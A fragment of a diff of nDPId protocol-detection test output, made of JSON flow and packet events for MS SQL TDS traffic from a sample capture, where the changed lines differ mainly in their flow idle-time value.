-00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1278068444614,"pkt":"ADAFzckRADAFzck9CABFAADvT85AAIAGJlwKb29vCgAAAStnBZlFt6Pw51OjJ1AY\/N33oQAAAwkAxwAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAAESIzRFVmd4iZqrvM3e7\/AAAfAADnCgAJBAABMgoAQgBvAGcAdQBzAAAAHwAAJgQEAQAAAAAAJggILQAAAAAAAAAAAKUcABwAASNFZ4mrze\/ty6mHZUMhASNFZ4mrze\/ty6mHZQAAJgQEEgAAAA=="} 
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":322,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":322,"pkt_l4_len":288,"thread_ts_msec":1278068444650,"pkt":"ADAFzckRADAFzck9CABFAAE0T9pAAIAGJgsKb29vCgAAAVbOBZn+D2d0K1+fyFAY+5tcOQAAAwkBDAAAAQAXAHAAcgBvAGMAXwBGAGUAdABjAGgATQB5AEUAeABhAG0AcABsAGUARABhAHQAYQAAAAAAJBAQASNFZ4mrze8BI0VniavN7wAA5wAACQQAATIAAAAA5woACQQAATIKAEIATwBHAFUAUwAAAGgBAQAAAG8ICP7\/\/\/8AAAAAAAAmBAQAAAAAAAAmBAQAAAAAAAAmBAAAACQQAAAAaAEAAAAmAQEAAAClHAAcAAEjRWeJq83vASNFZ4mrze8BI0VniavN7wEjRWcAACYEAAAAJgEBAQAAJgQEAABQAAAAJggILQAAAAAAAAAAACYBAQEAAGgBAQAAAOcCAAkEAAEy\/\/8AASYBAA=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1278068444666,"pkt":"ADAFzckRADAFzck9CABFAAFoT95AAIAGJdMKb29vCgAAAYI1BZl4aO73Gv+xN1AY\/dgFJQAAAwkBQAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAHQBkAGIAbwAuAHAAcgBvAGMAXwBHAGUAdABNAHkAUwBhAG0AcABsAGUARABhAHQAYQBJAHQAZQBtAHMAAAANQABTAGEAbQBwAGwAZQBJAHQAZQBtAEkAZAAAJBAQZhrDThSiU0infucGD\/\/\/BwdAAEQAYQB0AGEASQBkAADnAgAJBBAAAP\/\/DUAARABhAHQAYQBJAHQAZQBtAFQAeQBwAGUAACQQEJtFubyog2RFsdPp4ZhHj04IQABUAGEAYgBsAGUASQBkAADnAgAJBBAAAP\/\/DUAATQBhAHgARgBlAHQAYwBoAFMAaQB6AGUAACYEBGQAAAASQABTAG8AbQBlAE8AdABoAGUAcgBTAGEAbQBwAGwAZQBJAGQAACYEBAAAAAA="} 
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1259762400716,"flow_last_seen":1259762407935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":438,"flow_tot_l4_payload_len":2137,"flow_avg_l4_payload_len":125,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278068444584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1278068444584,"pkt":"ADAFzckRADAFzck9CABFAAECT7tAAIAGJlwKb29vCgAAAScPBZlFt6JP51MRDlAY+rgBzgAAAwEA2gAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAzIhEAVUR3ZoiZqrvM3e7\/AAAfAADnAAAJBAABMgAAAACnJAAJBAABMiQAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqAAAmBAQBAAAAAAAmCAgtAAAAAAAAAAAApQwADAABI0VniavN7\/7cupgAACYEBGwAAAA="} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278068444614,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1278068444614,"pkt":"ADAFzckRADAFzck9CABFAADvT85AAIAGJlwKb29vCgAAAStnBZlFt6Pw51OjJ1AY\/N33oQAAAwkAxwAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAAESIzRFVmd4iZqrvM3e7\/AAAfAADnCgAJBAABMgoAQgBvAGcAdQBzAAAAHwAAJgQEAQAAAAAAJggILQAAAAAAAAAAAKUcABwAASNFZ4mrze\/ty6mHZUMhASNFZ4mrze\/ty6mHZQAAJgQEEgAAAA=="} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7560000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278068444650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":322,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":322,"pkt_l4_len":288,"thread_ts_msec":1278068444650,"pkt":"ADAFzckRADAFzck9CABFAAE0T9pAAIAGJgsKb29vCgAAAVbOBZn+D2d0K1+fyFAY+5tcOQAAAwkBDAAAAQAXAHAAcgBvAGMAXwBGAGUAdABjAGgATQB5AEUAeABhAG0AcABsAGUARABhAHQAYQAAAAAAJBAQASNFZ4mrze8BI0VniavN7wAA5wAACQQAATIAAAAA5woACQQAATIKAEIATwBHAFUAUwAAAGgBAQAAAG8ICP7\/\/\/8AAAAAAAAmBAQAAAAAAAAmBAQAAAAAAAAmBAAAACQQAAAAaAEAAAAmAQEAAAClHAAcAAEjRWeJq83vASNFZ4mrze8BI0VniavN7wEjRWcAACYEAAAAJgEBAQAAJgQEAABQAAAAJggILQAAAAAAAAAAACYBAQEAAGgBAQAAAOcCAAkEAAEy\/\/8AASYBAA=="} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7560000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278068444666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1278068444666,"pkt":"ADAFzckRADAFzck9CABFAAFoT95AAIAGJdMKb29vCgAAAYI1BZl4aO73Gv+xN1AY\/dgFJQAAAwkBQAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAHQBkAGIAbwAuAHAAcgBvAGMAXwBHAGUAdABNAHkAUwBhAG0AcABsAGUARABhAHQAYQBJAHQAZQBtAHMAAAANQABTAGEAbQBwAGwAZQBJAHQAZQBtAEkAZAAAJBAQZhrDThSiU0infucGD\/\/\/BwdAAEQAYQB0AGEASQBkAADnAgAJBBAAAP\/\/DUAARABhAHQAYQBJAHQAZQBtAFQAeQBwAGUAACQQEJtFubyog2RFsdPp4ZhHj04IQABUAGEAYgBsAGUASQBkAADnAgAJBBAAAP\/\/DUAATQBhAHgARgBlAHQAYwBoAFMAaQB6AGUAACYEBGQAAAASQABTAG8AbQBlAE8AdABoAGUAcgBTAGEAbQBwAGwAZQBJAGQAACYEBAAAAAA="} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1259762400716,"flow_last_seen":1259762407935,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":438,"flow_tot_l4_payload_len":2137,"flow_avg_l4_payload_len":125,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7560000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7560000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 